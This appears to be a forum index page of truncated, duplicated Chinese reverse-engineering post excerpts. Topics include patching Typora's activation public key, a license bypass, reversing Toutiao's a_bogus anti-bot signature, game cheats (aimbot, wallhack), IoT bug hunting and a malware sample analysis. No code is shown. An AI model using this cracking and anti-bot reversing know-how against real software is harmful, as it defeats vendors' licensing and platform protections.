[md]# Typora 1.10.8公钥替换 在最新版本中的Typora中,解包app.asar会发现软件使用了node vm将js编译成了jsc,在之前的版本中,分析atom.js可以得知Typora的激活实际上就是一个简单RSA公钥解密,只要patch了公钥就可 ...[md]# Typora 1.10.8公钥替换 在最新版本中的Typora中,解包app.asar会发现软件使用了node vm将js编译成了jsc,在之前的版本中,分析atom.js可以得知Typora的激活实际上就是一个简单RSA公钥解密,只要patch了公钥就可 ...
[md]# 前言 去年年中开始接触IOT设备的漏洞挖掘, 之后有几个聊胜于无的产出, 但没啥变现机会, 大概是去年的国庆前后, 一位学长告诉我某米SRC最近有活动, 可以多看看这家路由器 某米大概是国内少有的愿意给该类漏洞支付赏金并且**出手大方**的厂商了, 早在之前其实 ...[md]# 前言 去年年中开始接触IOT设备的漏洞挖掘, 之后有几个聊胜于无的产出, 但没啥变现机会, 大概是去年的国庆前后, 一位学长告诉我某米SRC最近有活动, 可以多看看这家路由器 某米大概是国内少有的愿意给该类漏洞支付赏金并且**出手大方**的厂商了, 早在之前其实 ...
吾爱这个代码好像会少东西,我这里复制下来使用发现,在线无法使用,可以去开源那里下载,或者,下载附件。 下载: 先放个开源链接,ps:(这里面有完全纯本地版本):https://github.com/xyz66882/Web-page-player 国 ...吾爱这个代码好像会少东西,我这里复制下来使用发现,在线无法使用,可以去开源那里下载,或者,下载附件。 下载: 先放个开源链接,ps:(这里面有完全纯本地版本):https://github.com/xyz66882/Web-page-player 国 ...
[md] # 一、背景 近期发现一枚样本,传播载体为批处理文件(`cl.bat`),经过分析发现其通过`net use`命令将某Cloudflare Tunnel内网穿透服务挂载为网络驱动器后,下载并运行其中的恶意`Python`脚本(`yea.py`)。该p ...[md] # 一、背景 近期发现一枚样本,传播载体为批处理文件(`cl.bat`),经过分析发现其通过`net use`命令将某Cloudflare Tunnel内网穿透服务挂载为网络驱动器后,下载并运行其中的恶意`Python`脚本(`yea.py`)。该p ...
最近在学代码虚拟化,看了章立春老师的代码虚拟与自动化分析这本书前几章,第三章自己实现了一个简单的虚拟机,明白了虚拟化的基本原理。遂开始研究了一下vmp3.2,谈论一下我的一点理解和心得,如有错误请指正。刚开始接 ...最近在学代码虚拟化,看了章立春老师的代码虚拟与自动化分析这本书前几章,第三章自己实现了一个简单的虚拟机,明白了虚拟化的基本原理。遂开始研究了一下vmp3.2,谈论一下我的一点理解和心得,如有错误请指正。刚开始接 ...
[md]# AI与JSVMP的初次结合-深入浅出的逆向JSVMP 关键词:jr头条vmp逆向,a_bogus,jsvmp,插桩,ai > 目标接口:aHR0cHM6Ly93d3cudG91dGlhby5jb20vYXBpL3BjL2xpc3QvZmVlZA== ***本文仅供学习交流,因使用本文内容而产生的任何风险及后果,作者不承担任何责任,一 ...[md]# AI与JSVMP的初次结合-深入浅出的逆向JSVMP 关键词:jr头条vmp逆向,a_bogus,jsvmp,插桩,ai > 目标接口:aHR0cHM6Ly93d3cudG91dGlhby5jb20vYXBpL3BjL2xpc3QvZmVlZA== ***本文仅供学习交流,因使用本文内容而产生的任何风险及后果,作者不承担任何责任,一 ...
[md]# 1、简介 AES加密中,密钥(KEY)、初始化向量(IV)、加密模式(MODE)、填充模式(PADDING)是核心参数, 逆向分析AES就是要找到这几个参数。 此次以分析 Quick_Any2Ico(图标提取与格式转换软件) 这个小软件为例, ...[md]# 1、简介 AES加密中,密钥(KEY)、初始化向量(IV)、加密模式(MODE)、填充模式(PADDING)是核心参数, 逆向分析AES就是要找到这几个参数。 此次以分析 Quick_Any2Ico(图标提取与格式转换软件) 这个小软件为例, ...
[md]# frida-analykit + wireshark 流量抓包(上)- 初探libssl体验wireshark无视证书校验的实时https抓包 ## 工具 - [frida-analykit](https://github.com/ZSA233/frida-analykit.git) - [wireshark](https://ww ...[md]# frida-analykit + wireshark 流量抓包(上)- 初探libssl体验wireshark无视证书校验的实时https抓包 ## 工具 - [frida-analykit](https://github.com/ZSA233/frida-analykit.git) - [wireshark](https://ww ...
[md] 第一次写逆向调试的文章,不足之处,敬请关照! 能力有限,大佬勿喷! 新人学做修改器拿什么游戏练手?可能大部分人会想到《植物大战僵尸》和《血战上海滩》,是的,的确是这样,这两款游戏不仅家喻户晓,而 ...[md] 第一次写逆向调试的文章,不足之处,敬请关照! 能力有限,大佬勿喷! 新人学做修改器拿什么游戏练手?可能大部分人会想到《植物大战僵尸》和《血战上海滩》,是的,的确是这样,这两款游戏不仅家喻户晓,而 ...
[md]第一次参加,写得不怎么好,还请多多指教🙇‍♂️ ## 题目 启动游戏后可以明显发现游戏存在加速、自瞄、透视等问题。 首先判断虚幻引擎版本,我们可以直接在`AndroidManifest. ...[md]第一次参加,写得不怎么好,还请多多指教🙇‍♂️ ## 题目 启动游戏后可以明显发现游戏存在加速、自瞄、透视等问题。 首先判断虚幻引擎版本,我们可以直接在`AndroidManifest. ...
[md] ## 前言 上一年雖然止步於初賽,但之後找了時間復現了一下決賽,大概花了2、3周才復現完( 還是在有文章參考的情況下 ),內容很多,大致包括保護分析、vm分析、透視、自瞄實現。 今年的決賽比較不同,他給了2 ...[md] ## 前言 上一年雖然止步於初賽,但之後找了時間復現了一下決賽,大概花了2、3周才復現完( 還是在有文章參考的情況下 ),內容很多,大致包括保護分析、vm分析、透視、自瞄實現。 今年的決賽比較不同,他給了2 ...
[md]# 利用frida 探究对于模拟器下arm so加载 这里是对于模拟器下的arm下的so文件进行的分析探究,实际上对于这些的知识上,相关的文章是很少的,这次也算是对于模拟器的研究和分析了 ## 环境搭建: 这里使用 ...[md]# 利用frida 探究对于模拟器下arm so加载 这里是对于模拟器下的arm下的so文件进行的分析探究,实际上对于这些的知识上,相关的文章是很少的,这次也算是对于模拟器的研究和分析了 ## 环境搭建: 这里使用 ...
[md]解开Windows微信备份文件 使用电脑微信上的“菜单-迁移与备份-备份与恢复”功能可以将手机微信上的聊天记录存储到电脑,以后也可以恢复到手机。如果可以将这些备份的聊天记录直接提取出来就可以随心所欲地整理、 ...[md]解开Windows微信备份文件 使用电脑微信上的“菜单-迁移与备份-备份与恢复”功能可以将手机微信上的聊天记录存储到电脑,以后也可以恢复到手机。如果可以将这些备份的聊天记录直接提取出来就可以随心所欲地整理、 ...
[md]##### 程序介绍 画画程序 ##### 演示版保护机制 程序启动后弹窗提示“The program is started in the restricted mode because a valid license certificate is not installed.” 单击确定后提示窗口消失转而 ...[md]##### 程序介绍 画画程序 ##### 演示版保护机制 程序启动后弹窗提示“The program is started in the restricted mode because a valid license certificate is not installed.” 单击确定后提示窗口消失转而 ...
[md]## 去除QQ聊天窗口的平滑滚动 QQ版本: PC经典版 9.7.23 (29394) 工具: Cheat Engine (扫内存工具), IDA (逆向工具) QQ在大概四五年前加入的聊天窗口的平滑滚动, 即滚动鼠标滚轮时, 有一个滚动的过渡动画, ...[md]## 去除QQ聊天窗口的平滑滚动 QQ版本: PC经典版 9.7.23 (29394) 工具: Cheat Engine (扫内存工具), IDA (逆向工具) QQ在大概四五年前加入的聊天窗口的平滑滚动, 即滚动鼠标滚轮时, 有一个滚动的过渡动画, ...
[md] ## 代码插装 在堆栈中查看,其中有一处很明显的captcha.js,应该是captchabody生成的关键js,我们进入查看,整体预览js代码,发现webpack+switch控制流+vmp。接着查桩,先在switch处插桩,看看大概都做了什么。 ### switch插装点 !() ### apply插装 ...[md] ## 代码插装 在堆栈中查看,其中有一处很明显的captcha.js,应该是captchabody生成的关键js,我们进入查看,整体预览js代码,发现webpack+switch控制流+vmp。接着查桩,先在switch处插桩,看看大概都做了什么。 ### switch插装点 !() ### apply插装 ...
